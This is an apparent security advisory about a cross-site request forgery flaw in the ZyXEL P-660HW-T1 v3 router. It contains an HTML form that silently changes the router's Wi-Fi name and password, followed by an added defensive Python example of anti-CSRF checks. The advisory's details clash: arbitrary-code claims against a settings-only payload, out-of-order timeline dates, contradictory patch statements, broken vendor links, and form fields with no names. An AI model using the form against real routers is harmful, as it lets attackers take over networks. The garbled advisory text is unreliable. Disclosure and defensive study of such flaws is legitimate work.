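T1 v3 Wireless Router CSRF Vulnerability

Published: 2014-05-29
Updated: 2014-05-31

Affected systems:
ZyXEL P-660HW-T1 v3
Description:
--------------------------------------------------------------------------------
The Zyxel P-660HW-T1 is a wireless router product.

The administration panel of the P-660HW-T1 wireless router version 3 contains a security vulnerability that an attacker can exploit to execute arbitrary code on affected devices.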
 
<*Source: Mustafa ALTINKAYNAK
  *>

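Test method:
--------------------------------------------------------------------------------

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use it at your own risk!
Mustafa ALTINKAYNAK provided the following test method: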
 
# Exploit Title: Zyxel P-660HW-T1 v3 Wireless Router - CSRF Vulnerabilities
 # Date: 05/22/2014
 # Author: Mustafa ALTINKAYNAK
 # Vendor Homepage:?t=p
 # Category: Hardware/Wireless Router
 # Tested on: Zyxel P-660HW-T1 v3 Wireless Router
 # Patch/ Fix: Vendor has not provided any fix for this yet
 ---------------------------
 
 Technical Details
 ---------------------------
 This vulnerability was tested at the P-660HW-T1 devices. Admin panel is open you can run remote code destination.
 You can send the form below to prepare the target. Please offending. Being partners in crime.

Disclosure Timeline
 ---------------------------
 05/21/2014  Contacted Vendor
05/22/2014  Vendor Replied
 04/22/2014  Vulnerability Explained (No reply received)
 05/23/2014  Full Disclosure

Exploit Code
---------------------------
 
 Change Wifi (WPA2/PSK) password & SSID by CSRF
 ---------------------------------------------------------------------------------
 <html>
 <body>
 <form action="http://192.168.1.1/Forms/WLAN_General_1"
 method="POST">
 <input type="hidden" value="on">
 <input type="hidden" value="00000005">
 <input type="hidden" value="WIFI NAME">
 <input type="hidden" value="00000002">
 <input type="hidden" value="0">
 <input type="hidden" value="123456">
 <input type="hidden" value="1800">
 <input type="hidden" value="00000000">
 <input type="hidden" value="Uygula">
 </form>
 </body>
 </html>

-----------

Mustafa ALTINKAYNAK
 twitter : @m_altinkaynak <https://twitter.com/m_altinkaynak>
 

Recommendation:
--------------------------------------------------------------------------------
Vendor patch:
 
ZyXEL
 -----
 The vendor has released an upgrade patch that fixes this security issue; download it from the vendor's homepage:
 
?t=p
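
An added example, not part of the original advisory and not the vendor's firmware code: the server-side checks that make a cross-site form post to a settings endpoint such as /Forms/WLAN_General_1 fail, namely same-origin validation of Origin/Referer plus a session-bound anti-CSRF token. The function names, the `csrf_token` field, the allowed-host list and the session id are assumptions for illustration.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

SERVER_SECRET = secrets.token_bytes(32)   # per-boot secret (assumption)
ALLOWED_HOSTS = {"192.168.1.1"}           # panel address used on this page
STATE_CHANGING = {"POST", "PUT", "PATCH", "DELETE"}


def issue_csrf_token(session_id: str) -> str:
    """Token bound to the admin session; embedded in every settings form."""
    mac = hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256)
    return mac.hexdigest()


def same_origin(headers: dict) -> bool:
    """Origin (or, failing that, Referer) must name the panel's own host."""
    source = headers.get("Origin") or headers.get("Referer")
    host = headers.get("Host", "").lower()
    if not source or host not in ALLOWED_HOSTS:
        return False  # fail closed when provenance is missing or Host is odd
    return urlsplit(source).netloc.lower() == host


def allow_request(method: str, headers: dict, form: dict, session_id: str) -> bool:
    """True only if a state-changing request came from the panel itself."""
    if method.upper() not in STATE_CHANGING:
        return True  # safe methods must never change configuration
    if not same_origin(headers):
        return False
    supplied = form.get("csrf_token", "")
    expected = issue_csrf_token(session_id)
    return hmac.compare_digest(supplied.encode(), expected.encode())


if __name__ == "__main__":
    sid = "constructed-session-id"  # constructed sample value
    token = issue_csrf_token(sid)
    panel = {"Host": "192.168.1.1", "Origin": "http://192.168.1.1"}
    cross = {"Host": "192.168.1.1", "Origin": "http://attacker.example"}
    print("panel form with token:", allow_request("POST", panel, {"csrf_token": token}, sid))
    print("cross-site form:      ", allow_request("POST", cross, {}, sid))
```

Until a fixed firmware is installed on the device, logging out of the admin panel after each configuration session narrows the window in which a cross-site request carries valid credentials.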
